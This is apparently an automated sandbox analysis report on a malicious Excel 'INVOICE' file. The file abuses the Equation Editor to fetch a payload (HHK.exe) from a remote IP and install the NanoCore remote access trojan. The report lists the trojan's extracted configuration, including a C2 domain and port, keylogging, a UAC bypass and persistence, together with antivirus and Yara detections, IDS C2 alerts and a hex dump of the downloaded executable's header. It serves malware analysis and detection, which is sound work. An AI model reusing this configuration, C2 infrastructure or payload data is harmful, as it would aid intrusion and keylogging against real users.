Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp |
Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "9ed8d108-2eb1-4e23-9679-783796e4", "Group": "Default", "Domain1": "godisgood1.hopto.org", "Domain2": "", "Port": 7712, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"} |
Source: INVOICE = 212888585 .xlsx |
Virustotal: Detection: 42% |
Perma Link |
Source: INVOICE = 212888585 .xlsx |
ReversingLabs: Detection: 50% |
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe |
ReversingLabs: Detection: 30% |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
ReversingLabs: Detection: 30% |
Source: Yara match |
File source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTR |
Source: INVOICE = 212888585 .xlsx |
Joe Sandbox ML: detected |
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe |
Joe Sandbox ML: detected |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
Joe Sandbox ML: detected |
Source: 4.2.ALP.exe.400000.0.unpack |
Avira: Label: TR/Dropper.Gen |
Source: 17.2.smtpsvc.exe.400000.0.unpack |
Avira: Label: TR/Dropper.Gen |
Source: 4.2.ALP.exe.6c0000.3.unpack |
Avira: Label: TR/NanoCore.fadte |
Source: 16.2.smtpsvc.exe.400000.0.unpack |
Avira: Label: TR/Dropper.Gen |
Source: 14.2.ALP.exe.400000.0.unpack |
Avira: Label: TR/Dropper.Gen |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process created: C:\Users\user\AppData\Roaming\ALP.exe |
|
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process created: C:\Users\user\AppData\Roaming\ALP.exe |
Jump to behavior |
Source: unknown |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: |
Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: ALP.exe, 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp |
Source: |
Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp |
Source: |
Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp |
Source: |
Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: ALP.exe, 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp |
Source: |
Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ALP.exe, 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp |
Source: |
Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp |
Source: global traffic |
DNS query: name: godisgood1.hopto.org |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-08h] |
4_2_0072C8F6 |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-08h] |
4_2_0072C890 |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-08h] |
4_2_0072C880 |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-04h] |
4_2_00729EC8 |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 136.144.41.96:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 136.144.41.96:80 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49166 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49167 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 103.147.184.84:7712 |
Source: Malware configuration extractor |
URLs: godisgood1.hopto.org |
Source: Malware configuration extractor |
URLs: |
Source: Joe Sandbox View |
ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN |
Source: Joe Sandbox View |
ASN Name: WORLDSTREAMNL WORLDSTREAMNL |
Source: global traffic |
HTTP traffic detected: GET /HHK.exe HTTP/1.1Connection: Keep-AliveHost: 136.144.41.96 |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:57:37 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9Last-Modified: Wed, 15 Sep 2021 03:07:30 GMTETag: "93400-5cbffffb6965c"Accept-Ranges: bytesContent-Length: 603136Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 98 60 4b 8c 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2a 09 00 00 08 00 00 00 00 00 00 ba 48 09 00 00 20 00 00 00 60 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 48 09 00 4f 00 00 00 00 60 09 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 09 00 0c 00 00 00 4c 48 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 28 09 00 00 20 00 00 00 2a 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 09 00 00 02 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 48 09 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 c4 5e 01 00 03 00 00 00 6f 00 00 06 54 9e 01 00 f8 a9 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 0 |